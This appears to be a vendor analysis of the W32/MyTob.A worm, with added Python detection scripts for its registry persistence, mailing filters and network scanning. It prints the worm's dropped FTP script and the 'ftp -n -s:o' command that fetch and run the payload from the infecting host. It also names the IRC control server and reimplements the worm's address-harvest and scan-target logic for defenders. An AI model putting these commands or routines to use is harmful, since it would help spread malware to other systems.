W32/MyTob.A@mm
Analysis
This virus is written in Visual C and contains code to spread to other
systems using these methods -
- SMTP email
- networked systems
- LSASS buffer-overflow exploit [MS04-011] over TCP port 445
The virus also has the following characteristics -
- runs a built-in FTP daemon that identifies itself as "StnyFtpd" and may
serve the file "bingoo.exe" to connecting systems
- may connect to the IRC server "irc.blackcarder.net" and await commands
from a malicious user
The virus borrows code from W32/Mydoom, which causes some AV scanners to identify it as a variant of the W32/Mydoom family.
Loading at Windows startup
When run, the virus copies itself to the local system as -
C:\WINNT\system32\msnmsgr.exe
The file is in excess of 120,000 bytes. The virus then creates the following registry values; the Run and RunServices entries load it at Windows startup -
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
"MSN" = msnmsgr.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"MSN" = msnmsgr.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
"MSN" = msnmsgr.exe
HKEY_CURRENT_USER\Software\Microsoft\OLE
"MSN" = msnmsgr.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole
"MSN" = msnmsgr.exe
HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control\MSN
"MSN" = msnmsgr.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MSN
"MSN" = msnmsgr.exe
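A quick way to hunt for the persistence entries listed above is to scan a registry export for the "MSN" value under those keys. The script below is an added example written for this page, not part of the original analysis or the virus's code: it parses the .reg export format (section headers in square brackets, "name"="value" lines) and returns every hit. The export text is constructed for the example; the key names are the ones given above.

```python
"""Scan a Windows .reg export for the W32/MyTob.A persistence values.

Added example for this page. Only REG_SZ lines ("name"="value") are parsed,
which is all this check needs; hex:/dword: lines are ignored.
"""
import re

# Registry locations listed in the analysis, upper-cased for comparison
# (registry key names are case-insensitive).
MYTOB_KEYS = {
    r"HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSERVICES",
    r"HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\OLE",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\OLE",
    r"HKEY_CURRENT_USER\SYSTEM\CURRENTCONTROLSET\CONTROL\MSN",
    r"HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\MSN",
}
MYTOB_VALUE_NAME = "MSN"
MYTOB_IMAGE = "msnmsgr.exe"

SECTION_RE = re.compile(r"^\[(.+)\]\s*$")
VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"\s*$')


def parse_reg_export(text):
    """Yield (key, name, value) for every string value in a .reg export."""
    key = None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if m and key is not None:
            # .reg files write backslashes in values as "\\"; undo that.
            yield key, m.group(1), m.group(2).replace("\\\\", "\\")


def find_mytob_persistence(text):
    """Return (key, value) pairs that match the MyTob autorun indicator.

    Both the bare "msnmsgr.exe" and a full path ending in it are reported,
    since the analysis shows the bare name but the binary sits in system32.
    """
    hits = []
    for key, name, value in parse_reg_export(text):
        if (key.upper() in MYTOB_KEYS and name == MYTOB_VALUE_NAME
                and value.lower().endswith(MYTOB_IMAGE)):
            hits.append((key, value))
    return hits


# Constructed sample export: two MyTob entries plus unrelated autorun values.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"MSN"="msnmsgr.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MSN]
"MSN"="C:\\WINNT\\system32\\msnmsgr.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="C:\\Users\\u\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"
"""

if __name__ == "__main__":
    for key, value in find_mytob_persistence(SAMPLE_EXPORT):
        print(f"MyTob persistence: [{key}] MSN = {value}")
```

To run it against a real host, export the hives with `reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run run.reg` (and likewise for the other keys) and read the file with `encoding="utf-16"`, since reg.exe writes exports as UTF-16. Matching on the key and value name together matters: the genuine MSN Messenger client is also called msnmsgr.exe but lives under Program Files, so the file name alone is not a reliable indicator.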
SMTP mass-mailing routine
The virus has instructions to send a copy of itself to contacts found in files
of certain extensions. This virus appears to have borrowed the same harvest
and exclusion routines as found in the W32/Mydoom virus family. Email addresses
are sampled from files having these extensions -
- adb
- asp
- dbx
- htm
- php
- pl
- sht
- tbb
- wab
The captured addresses are used as targets for the mailing routine. As with other viruses using this technique, the virus will avoid selecting email addresses containing certain strings, such as these -
- -._!
- -._!@
- .edu
- .gov
- .mil
- abuse
- accoun
- acketst
- admin
- anyone
- arin.
- avp
- be_loyal:
- berkeley
- borlan
- bsd
- bugs
- ca
- certific
- contact
- example
- fcnz
- feste
- fido
- foo.
- fsf.
- gnu
- gold-certs
- gov.
- help
- hotmail
- iana
- ibm.com
- icrosof
- icrosoft
- ietf
- info
- inpris
- isc.o
- isi.e
- kernel
- linux
- listserv
- math
- me
- mit.e
- mozilla
- msn.
- mydomai
- no
- nobody
- nodomai
- noone
- not
- nothing
- ntivi
- page
- panda
- pgp
- postmaster
- privacy
- rating
- rfc-ed
- ripe.
- root
- ruslis
- samples
- secur
- sendmail
- service
- site
- soft
- somebody
- someone
- sopho
- spm
- submit
- support
- syma
- tanford.e
- the.bat
- unix
- usenet
- utgers.ed
- webmaster
- www
- you
- your
The virus carries hard-coded message bodies and varies the body text from one email to the next, choosing from these -
- Mail transaction failed. Partial message is available.
- The message contains Unicode characters and has been sent as a binary attachment.
- The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.
- test
The email attachment uses one of these names as its base name, combined with a .BAT, .CMD, .PIF, .EXE, .SCR, or .ZIP file extension -
- body
- message
- test
- data
- file
- text
- doc
- readme
- document
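The harvest, exclusion and attachment-naming behaviour described in this section can be modelled to see which addresses a host would actually target and which attachment names a mail gateway should quarantine. The code below is an added example written for this page, not the virus's own routine. It follows the text literally: an address is dropped if it contains any listed string anywhere, compared case-insensitively. The analysis does not say whether the virus tests the whole address or only the domain part, and with a whole-address substring test the short entries ("ca", "me", "no") discard far more than the obvious vendor and abuse mailboxes; the sample page and file names are constructed for the example.

```python
"""Model of the W32/MyTob.A mailing-routine filters. Added example, not the
virus's code. The exclusion list and attachment names are those given in the
analysis; the matching semantics (whole address, case-insensitive substring)
are an assumption taken from the text.
"""
import re

# Exclusion list exactly as the analysis gives it (88 entries).
EXCLUDED_SUBSTRINGS = (
    "-._!", "-._!@", ".edu", ".gov", ".mil", "abuse", "accoun", "acketst",
    "admin", "anyone", "arin.", "avp", "be_loyal:", "berkeley", "borlan", "bsd",
    "bugs", "ca", "certific", "contact", "example", "fcnz", "feste", "fido",
    "foo.", "fsf.", "gnu", "gold-certs", "gov.", "help", "hotmail", "iana",
    "ibm.com", "icrosof", "icrosoft", "ietf", "info", "inpris", "isc.o", "isi.e",
    "kernel", "linux", "listserv", "math", "me", "mit.e", "mozilla", "msn.",
    "mydomai", "no", "nobody", "nodomai", "noone", "not", "nothing", "ntivi",
    "page", "panda", "pgp", "postmaster", "privacy", "rating", "rfc-ed", "ripe.",
    "root", "ruslis", "samples", "secur", "sendmail", "service", "site", "soft",
    "somebody", "someone", "sopho", "spm", "submit", "support", "syma",
    "tanford.e", "the.bat", "unix", "usenet", "utgers.ed", "webmaster", "www",
    "you", "your",
)

# File types the virus searches for addresses.
HARVEST_EXTENSIONS = ("adb", "asp", "dbx", "htm", "php", "pl", "sht", "tbb", "wab")

# Attachment base names and extensions from the analysis.
ATTACHMENT_NAMES = ("body", "message", "test", "data", "file", "text",
                    "doc", "readme", "document")
ATTACHMENT_EXTENSIONS = ("bat", "cmd", "pif", "exe", "scr", "zip")

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
ATTACHMENT_RE = re.compile(
    r"^(?:%s)\.(?:%s)$" % ("|".join(ATTACHMENT_NAMES),
                           "|".join(ATTACHMENT_EXTENSIONS)),
    re.IGNORECASE,
)


def is_harvest_target(filename):
    """True if the file has an extension the virus scans for addresses."""
    return filename.rsplit(".", 1)[-1].lower() in HARVEST_EXTENSIONS


def is_excluded(address):
    """True if the virus would skip this address (assumed: case-insensitive
    substring test over the whole address)."""
    lowered = address.lower()
    return any(s in lowered for s in EXCLUDED_SUBSTRINGS)


def harvest(text):
    """Addresses found in text that survive the exclusion filter, deduplicated."""
    targets = []
    for addr in EMAIL_RE.findall(text):
        addr = addr.lower()
        if not is_excluded(addr) and addr not in targets:
            targets.append(addr)
    return targets


def matches_mytob_attachment(filename):
    """True for names such as document.pif or Readme.ZIP."""
    return ATTACHMENT_RE.match(filename) is not None


# Constructed sample .htm content with a mix of kept and excluded addresses.
SAMPLE_HTM = """<p>Contact: webmaster@fabrikam.test or dave@fabrikam.test</p>
<p>Students: alice@cs.mit.edu, bugs to bugs@contoso.test</p>
<p>Sales: bob@contoso.test and Bob@contoso.test (same mailbox, different case)</p>
<p>Vendor: samples@sopho-lab.test</p>
"""

if __name__ == "__main__":
    print("targets:", harvest(SAMPLE_HTM))
    for name in ("document.pif", "Readme.ZIP", "report.pdf", "mydocument.exe"):
        print(f"{name:16} mytob-style: {matches_mytob_attachment(name)}")
```

Note the collateral effect of the short entries: `is_excluded("carol@contoso.test")` is true purely because "carol" contains "ca". That makes the kept list smaller than the raw harvest, which is one reason outbound-mail telemetry from an infected host shows a skewed set of recipient domains rather than the full address book.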
Network spreading routine
The virus first binds to a high TCP port such as 36276 and spawns a thread
that serves as an FTP server on that port. The server greets a connecting
client with this banner -
220 StnyFtpd 0wns j0
and responds with this string when the client quits -
221 Goodbye happy r00ting.
Next, the virus attempts to connect to systems in the same Class A (/8) range
as the infected system. It keeps the first octet of the infected system's IP
address and randomises the remaining octets, so the targets span randomly
selected Class B and Class C ranges.
For example, if the infected system has the IP address 192.168.29.56 [a
private address behind network address translation, or NAT], the virus may
try to connect to random addresses such as these -
- 192.168.1.71
- 192.168.113.2
- 192.168.44.50, and so on
The virus attempts to connect to each random address on TCP port 445. If a connection can be made, the virus uses the LSASS buffer-overflow exploit (MS04-011) to gain access to the system. Once access is obtained, the virus writes an FTP script to the compromised system with these instructions, where the %s and %d placeholders are filled at runtime with the infecting system's IP address and FTP port -
open %s %d
user 1 l
get bling.exe
quit
The virus then runs the script on the compromised system with FTP.EXE in non-interactive mode, which retrieves a copy of the virus as "bling.exe" from the infecting system, and executes it -
ftp -n -s:o
bling.exe
Backdoor functionality
The virus creates a thread that functions as a backdoor on a high TCP port
such as 24141. It also connects to the IRC server 'irc.blackcarder.net' to
receive instructions from a malicious user. The commands include the
following -
.update
.raw
.exec
.dl
.rm
.quit
.su
.uptim
.login
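The spreading and backdoor behaviour above leaves two kinds of trace a defender can look for: one internal host opening 445/tcp connections to many random addresses inside its own /8, and the fixed strings of the FTP daemon, the dropped FTP script and the IRC server name. The code below is an added example for both sections, not the virus's code. random_targets() reproduces the target selection the analysis describes (first octet kept, remaining 24 bits random); the connection records and captured lines are constructed, and the scan threshold of 20 distinct hosts is an assumption to tune per environment.

```python
"""Detection helpers for the W32/MyTob.A network spreading and backdoor
behaviour. Added example for this page; sample data is constructed."""
import ipaddress
import random
import re

FTP_BANNER = "220 StnyFtpd 0wns j0"
FTP_GOODBYE = "221 Goodbye happy r00ting."
IRC_SERVER = "irc.blackcarder.net"
SMB_PORT = 445

# Fixed strings from the analysis, checked in order; first match wins.
IOC_PATTERNS = (
    ("stnyftpd-banner", re.compile(re.escape(FTP_BANNER))),
    ("stnyftpd-goodbye", re.compile(re.escape(FTP_GOODBYE))),
    # FTP script fetching the payload under either file name the analysis mentions.
    ("ftp-script-get", re.compile(r"\bget\s+(?:bling|bingoo)\.exe\b", re.I)),
    # ftp.exe run non-interactively with a script file (-n -s:<file>).
    ("ftp-script-exec", re.compile(r"\bftp\s+-n\s+-s:\S+", re.I)),
    ("irc-c2-server", re.compile(re.escape(IRC_SERVER), re.I)),
)


def classify_line(line):
    """Return the IOC label for one captured line, or None if nothing matches."""
    for label, pattern in IOC_PATTERNS:
        if pattern.search(line):
            return label
    return None


def random_targets(own_ip, count, seed=None):
    """Target addresses sharing own_ip's first octet, other octets random.

    This is the selection the analysis describes: 192.168.29.56 yields
    targets anywhere in 192.0.0.0/8. A seed makes the output reproducible.
    """
    rng = random.Random(seed)
    first_octet = int(ipaddress.IPv4Address(own_ip)) >> 24
    return [str(ipaddress.IPv4Address((first_octet << 24) | rng.getrandbits(24)))
            for _ in range(count)]


def same_class_a(a, b):
    """True if both addresses share their first octet."""
    return int(ipaddress.IPv4Address(a)) >> 24 == int(ipaddress.IPv4Address(b)) >> 24


def scanning_sources(connections, threshold=20):
    """Sources that reached >= threshold distinct hosts on 445/tcp in their own /8.

    `connections` is an iterable of (src, dst, dport) tuples. The threshold
    is an assumption for this example.
    """
    per_source = {}
    for src, dst, dport in connections:
        if dport == SMB_PORT and same_class_a(src, dst):
            per_source.setdefault(src, set()).add(dst)
    return sorted(s for s, dsts in per_source.items() if len(dsts) >= threshold)


# Constructed data: an infected host sweeping its /8 and a benign host
# talking to three file servers.
INFECTED = "192.168.29.56"
SAMPLE_CONNECTIONS = [(INFECTED, dst, SMB_PORT)
                      for dst in random_targets(INFECTED, 40, seed=7)]
SAMPLE_CONNECTIONS += [("10.0.0.5", "10.0.1.%d" % i, SMB_PORT) for i in (10, 11, 12)]

SAMPLE_LINES = [
    "220 StnyFtpd 0wns j0",
    "get bling.exe",
    "C:\\> ftp -n -s:o",
    "DNS query A irc.blackcarder.net",
    "220 Microsoft FTP Service",
]

if __name__ == "__main__":
    print("scanning sources:", scanning_sources(SAMPLE_CONNECTIONS))
    for line in SAMPLE_LINES:
        print(f"{classify_line(line) or '-':18} {line}")
```

The banner and goodbye strings are the cheapest signature because the daemon sends them unprompted on every connection, so a honeypot or scanner touching the high port sees them immediately; the 445/tcp fan-out check catches the worm before any exploit succeeds, since the connection attempts happen regardless of whether the target is vulnerable.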
Recommended Action
FortiGate systems:
- check the main screen using the web interface to ensure the latest AV/NIDS database has been downloaded and installed -- if required, enable the "Allow Push Update" option
Detection Availability
FortiGate: Extreme
FortiClient: Extended
FortiMail: Extended
FortiSandbox: Extended
FortiWeb: Extended
Web Application Firewall: Extended
FortiIsolator: Extended
FortiDeceptor: Extended
FortiEDR: